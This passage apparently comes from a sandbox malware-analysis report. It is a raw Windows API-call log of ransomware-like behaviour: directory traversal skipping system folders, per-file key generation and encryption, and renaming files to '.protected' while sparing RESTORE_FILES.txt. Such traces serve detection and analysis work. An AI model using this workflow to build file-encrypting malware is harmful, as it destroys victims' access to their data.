lpOverlapped=0x0) returned 1 [0095.577] CloseHandle (hObject=0xa4) returned 1 [0095.577] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.577] lstrcmpiW (lpString1="Music", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1="Music", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music") returned 25 [0095.578] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0095.578] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\*") returned 27 [0095.578] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.578] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\.") returned 27 [0095.578] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.578] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.578] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.578] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: 
pbBuffer=0x295f12c) returned 1 [0095.578] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\." (normalized: "c:\\users\\public\\music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.578] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.578] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.578] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.578] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\..") returned 28 [0095.579] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.579] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.579] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.579] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.579] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.579] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.579] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.579] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.579] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.579] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.579] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") 
returned 0x0 [0095.580] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini") returned 37 [0095.580] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.580] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.580] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.580] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.580] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.581] CloseHandle (hObject=0xb4) returned 1 [0095.582] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.protected") returned 47 [0095.582] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\desktop.ini.protected" (normalized: "c:\\users\\public\\music\\desktop.ini.protected")) returned 1 [0095.582] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: 
lpFindFileData=0x295f190) returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Windows") returned -1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Program Files") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="Program Files (x86)") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="$Recycle.bin") returned 1 [0095.582] lstrcmpiW (lpString1="Sample Music", lpString2="System Volume Information") returned -1 [0095.582] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music") returned 38 [0095.582] lstrcmpW (lpString1="Sample Music", lpString2=".") returned 1 [0095.582] lstrcmpW (lpString1="Sample Music", lpString2="..") returned 1 [0095.582] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*") returned 40 [0095.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.635] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.635] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.635] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.") returned 40 [0095.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.635] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.635] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.635] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.635] CryptEncrypt 
(in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\." (normalized: "c:\\users\\public\\music\\sample music\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.635] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.635] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.635] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\..") returned 41 [0095.635] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.635] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.635] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.636] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\.." 
(normalized: "c:\\users\\public\\music"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.636] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.636] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.636] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.636] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.636] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample 
Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.637] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0095.637] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.637] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x24a, lpOverlapped=0x0) returned 1 [0095.638] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffdb6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x24a, lpOverlapped=0x0) returned 1 [0095.638] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.638] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.638] CloseHandle (hObject=0xd4) returned 1 [0095.639] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.protected") returned 60 [0095.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\sample music\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini.protected" 
(normalized: "c:\\users\\public\\music\\sample music\\desktop.ini.protected")) returned 1 [0095.640] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Windows") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Program Files") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="Program Files (x86)") returned -1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="$Recycle.bin") returned 1 [0095.640] lstrcmpiW (lpString1="Kalimba.mp3", lpString2="System Volume Information") returned -1 [0095.640] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.640] StrStrIW (lpFirst="Kalimba.mp3", lpSrch=".protected") returned 0x0 [0095.640] lstrcmpW (lpString1="Kalimba.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0095.640] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.640] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".txt") returned 0x0 [0095.641] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".rar") returned 0x0 [0095.641] lstrlenW 
(lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0095.641] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".zip") returned 0x0 [0095.641] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.659] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.659] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.660] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.660] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.674] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.674] CloseHandle (hObject=0xd4) returned 1 [0095.683] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.protected") returned 60 [0095.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.protected")) returned 1 [0095.684] FindNextFileW (in: 
hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Windows") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Program Files") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="Program Files (x86)") returned -1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="$Recycle.bin") returned 1 [0095.684] lstrcmpiW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="System Volume Information") returned -1 [0095.684] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.684] StrStrIW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".protected") returned 0x0 [0095.684] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0095.684] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.684] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.684] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".txt") returned 0x0 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen 
Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".rar") returned 0x0 [0095.685] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0095.685] StrStrW (lpFirst="Maid with the Flaxen Hair.mp3", lpSrch=".zip") returned 0x0 [0095.685] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.698] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.698] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.698] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.698] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.699] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.700] CloseHandle (hObject=0xd4) returned 1 [0095.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.protected") returned 78 [0095.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the 
flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.protected")) returned 1 [0095.701] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Windows") returned -1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Program Files") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="Program Files (x86)") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="$Recycle.bin") returned 1 [0095.701] lstrcmpiW (lpString1="Sleep Away.mp3", lpString2="System Volume Information") returned -1 [0095.701] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.701] StrStrIW (lpFirst="Sleep Away.mp3", lpSrch=".protected") returned 0x0 [0095.701] lstrcmpW (lpString1="Sleep Away.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0095.701] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.701] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.727] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".txt") returned 0x0 [0095.727] lstrlenW 
